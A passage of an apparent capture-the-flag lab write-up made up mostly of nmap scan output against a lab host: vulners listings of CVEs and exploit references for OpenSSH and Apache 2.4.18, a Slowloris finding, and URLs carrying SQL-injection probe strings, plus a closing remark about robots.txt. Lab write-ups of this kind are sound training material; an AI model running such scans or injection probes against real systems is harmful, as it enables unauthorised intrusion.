|     	MSF:ILITIES/DEBIAN-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/	*EXPLOIT*
|     	EXPLOITPACK:98FE96309F9524B8C84C508837551A19	5.8	https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19	*EXPLOIT*
|     	EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	5.8	https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	*EXPLOIT*
|     	EDB-ID:46516	5.8	https://vulners.com/exploitdb/EDB-ID:46516	*EXPLOIT*
|     	EDB-ID:46193	5.8	https://vulners.com/exploitdb/EDB-ID:46193	*EXPLOIT*
|     	CVE-2019-6111	5.8	https://vulners.com/cve/CVE-2019-6111
|     	1337DAY-ID-32328	5.8	https://vulners.com/zdt/1337DAY-ID-32328	*EXPLOIT*
|     	1337DAY-ID-32009	5.8	https://vulners.com/zdt/1337DAY-ID-32009	*EXPLOIT*
|     	SSV:91041	5.5	https://vulners.com/seebug/SSV:91041	*EXPLOIT*
|     	PACKETSTORM:140019	5.5	https://vulners.com/packetstorm/PACKETSTORM:140019	*EXPLOIT*
|     	PACKETSTORM:136234	5.5	https://vulners.com/packetstorm/PACKETSTORM:136234	*EXPLOIT*
|     	EXPLOITPACK:F92411A645D85F05BDBD274FD222226F	5.5	https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F	*EXPLOIT*
|     	EXPLOITPACK:9F2E746846C3C623A27A441281EAD138	5.5	https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138	*EXPLOIT*
|     	EXPLOITPACK:1902C998CBF9154396911926B4C3B330	5.5	https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330	*EXPLOIT*
|     	EDB-ID:40858	5.5	https://vulners.com/exploitdb/EDB-ID:40858	*EXPLOIT*
|     	EDB-ID:40119	5.5	https://vulners.com/exploitdb/EDB-ID:40119	*EXPLOIT*
|     	EDB-ID:39569	5.5	https://vulners.com/exploitdb/EDB-ID:39569	*EXPLOIT*
|     	CVE-2016-3115	5.5	https://vulners.com/cve/CVE-2016-3115
|     	SSH_ENUM	5.0	https://vulners.com/canvas/SSH_ENUM	*EXPLOIT*
|     	PACKETSTORM:150621	5.0	https://vulners.com/packetstorm/PACKETSTORM:150621	*EXPLOIT*
|     	MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS	5.0	https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS	*EXPLOIT*
|     	EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	5.0	https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	*EXPLOIT*
|     	EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	5.0	https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	*EXPLOIT*
|     	EDB-ID:45939	5.0	https://vulners.com/exploitdb/EDB-ID:45939	*EXPLOIT*
|     	EDB-ID:45233	5.0	https://vulners.com/exploitdb/EDB-ID:45233	*EXPLOIT*
|     	CVE-2018-15919	5.0	https://vulners.com/cve/CVE-2018-15919
|     	CVE-2018-15473	5.0	https://vulners.com/cve/CVE-2018-15473
|     	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
|     	CVE-2016-10708	5.0	https://vulners.com/cve/CVE-2016-10708
|     	1337DAY-ID-31730	5.0	https://vulners.com/zdt/1337DAY-ID-31730	*EXPLOIT*
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/	*EXPLOIT*
|     	EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF	4.3	https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF	*EXPLOIT*
|     	EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF	4.3	https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF	*EXPLOIT*
|     	EDB-ID:40136	4.3	https://vulners.com/exploitdb/EDB-ID:40136	*EXPLOIT*
|     	EDB-ID:40113	4.3	https://vulners.com/exploitdb/EDB-ID:40113	*EXPLOIT*
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-6210	4.3	https://vulners.com/cve/CVE-2016-6210
|     	1337DAY-ID-25440	4.3	https://vulners.com/zdt/1337DAY-ID-25440	*EXPLOIT*
|     	1337DAY-ID-25438	4.3	https://vulners.com/zdt/1337DAY-ID-25438	*EXPLOIT*
|     	CVE-2019-6110	4.0	https://vulners.com/cve/CVE-2019-6110
|     	CVE-2019-6109	4.0	https://vulners.com/cve/CVE-2019-6109
|     	CVE-2018-20685	2.6	https://vulners.com/cve/CVE-2018-20685
|     	SSV:92581	2.1	https://vulners.com/seebug/SSV:92581	*EXPLOIT*
|     	CVE-2016-10011	2.1	https://vulners.com/cve/CVE-2016-10011
|     	SRC-2016-0002	0.0	https://vulners.com/srcincite/SRC-2016-0002	*EXPLOIT*
|     	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
|     	PACKETSTORM:140261	0.0	https://vulners.com/packetstorm/PACKETSTORM:140261	*EXPLOIT*
|     	PACKETSTORM:138006	0.0	https://vulners.com/packetstorm/PACKETSTORM:138006	*EXPLOIT*
|     	PACKETSTORM:137942	0.0	https://vulners.com/packetstorm/PACKETSTORM:137942	*EXPLOIT*
|_    	1337DAY-ID-30937	0.0	https://vulners.com/zdt/1337DAY-ID-30937	*EXPLOIT*
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server&#039;s resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.
| http-fileupload-exploiter:
|
|     Couldn&#039;t find a file-type field.
|
|_    Couldn&#039;t find a file-type field.
|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.
| http-sql-injection:
|   Possible sqli for queries:
|     http://10.10.105.134:80/item.php?id=1%27%20OR%20sqlspider
|     http://10.10.105.134:80/item.php?id=2%27%20OR%20sqlspider
|     http://10.10.105.134:80/item.php?id=3%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.105.134:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|_    http://10.10.105.134:80/assets/?C=N%3BO%3DA%27%20OR%20sqlspider
| vulners:
|   cpe:/a:apache:http_server:2.4.18:
|     	CVE-2021-44790	7.5	https://vulners.com/cve/CVE-2021-44790
|     	CVE-2021-39275	7.5	https://vulners.com/cve/CVE-2021-39275
|     	CVE-2021-26691	7.5	https://vulners.com/cve/CVE-2021-26691
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-7668	7.5	https://vulners.com/cve/CVE-2017-7668
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/	7.2	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/	7.2	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/	*EXPLOIT*
|     	EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	7.2	https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	*EXPLOIT*
|     	EDB-ID:46676	7.2	https://vulners.com/exploitdb/EDB-ID:46676	*EXPLOIT*
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	1337DAY-ID-32502	7.2	https://vulners.com/zdt/1337DAY-ID-32502	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/SUSE-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/FREEBSD-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/	*EXPLOIT*
|     	FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	6.8	https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	*EXPLOIT*
|     	CVE-2021-40438	6.8	https://vulners.com/cve/CVE-2021-40438
|     	CVE-2020-35452	6.8	https://vulners.com/cve/CVE-2020-35452
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	6.8	https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	*EXPLOIT*
|     	CVE-2021-44224	6.4	https://vulners.com/cve/CVE-2021-44224
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/	6.0	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/	6.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/	*EXPLOIT*
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2020-1927	5.8	https://vulners.com/cve/CVE-2020-1927
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	1337DAY-ID-33577	5.8	https://vulners.com/zdt/1337DAY-ID-33577	*EXPLOIT*
|     	CVE-2016-5387	5.1	https://vulners.com/cve/CVE-2016-5387
|     	SSV:96537	5.0	https://vulners.com/seebug/SSV:96537	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1333/	5.0	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1333/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1303/	5.0	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1303/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/	5.0	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/	*EXPLOIT*
|     	MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED	5.0	https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED	*EXPLOIT*
|     	EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	5.0	https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	*EXPLOIT*
|     	EXPLOITPACK:2666FB0676B4B582D689921651A30355	5.0	https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355	*EXPLOIT*
|     	EDB-ID:42745	5.0	https://vulners.com/exploitdb/EDB-ID:42745	*EXPLOIT*
|     	EDB-ID:40909	5.0	https://vulners.com/exploitdb/EDB-ID:40909	*EXPLOIT*
|     	CVE-2021-34798	5.0	https://vulners.com/cve/CVE-2021-34798
|     	CVE-2021-33193	5.0	https://vulners.com/cve/CVE-2021-33193
|     	CVE-2021-26690	5.0	https://vulners.com/cve/CVE-2021-26690
|     	CVE-2020-1934	5.0	https://vulners.com/cve/CVE-2020-1934
|     	CVE-2019-17567	5.0	https://vulners.com/cve/CVE-2019-17567
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2018-17189	5.0	https://vulners.com/cve/CVE-2018-17189
|     	CVE-2018-1333	5.0	https://vulners.com/cve/CVE-2018-1333
|     	CVE-2018-1303	5.0	https://vulners.com/cve/CVE-2018-1303
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2016-8743	5.0	https://vulners.com/cve/CVE-2016-8743
|     	CVE-2016-8740	5.0	https://vulners.com/cve/CVE-2016-8740
|     	CVE-2016-4979	5.0	https://vulners.com/cve/CVE-2016-4979
|     	1337DAY-ID-28573	5.0	https://vulners.com/zdt/1337DAY-ID-28573	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/	4.9	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/	*EXPLOIT*
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|     	MSF:ILITIES/UBUNTU-CVE-2018-1302/	4.3	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1302/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1301/	4.3	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1301/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/	*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2019-10092/	4.3	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/	4.3	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/	4.3	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/	*EXPLOIT*
|     	CVE-2020-11985	4.3	https://vulners.com/cve/CVE-2020-11985
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2018-1302	4.3	https://vulners.com/cve/CVE-2018-1302
|     	CVE-2018-1301	4.3	https://vulners.com/cve/CVE-2018-1301
|     	CVE-2018-11763	4.3	https://vulners.com/cve/CVE-2018-11763
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2016-1546	4.3	https://vulners.com/cve/CVE-2016-1546
|     	4013EC74-B3C1-5D95-938A-54197A58586D	4.3	https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D	*EXPLOIT*
|     	1337DAY-ID-33575	4.3	https://vulners.com/zdt/1337DAY-ID-33575	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/	*EXPLOIT*
|     	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
|     	CVE-2016-8612	3.3	https://vulners.com/cve/CVE-2016-8612
|     	PACKETSTORM:152441	0.0	https://vulners.com/packetstorm/PACKETSTORM:152441	*EXPLOIT*
|_    	MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_MEDIA_UPLOAD_EXEC/	0.0	https://vulners.com/metasploit/MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_MEDIA_UPLOAD_EXEC/	*EXPLOIT*
| http-enum:
|_  /robots.txt: Robots file
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/2%OT=22%CT=1%CU=42651%PV=Y%DS=4%DC=T%G=Y%TM=61FB4F78
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11
OS:NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(
OS:R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Uptime guess: 0.010 days (since Wed Feb  2 20:30:09 2022)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   35.71 ms  10.13.0.1
2   ... 3
4   170.37 ms 10.10.105.134

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb  2 20:43:52 2022 -- 1 IP address (1 host up) scanned in 915.75 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;SSH and Apache on port 80. Pretty standard. There is an enumerated /robots.txt file, which turns out to be invalid - it contains only the phrase “Wubbalubbadubdub”.&lt;/p&gt;
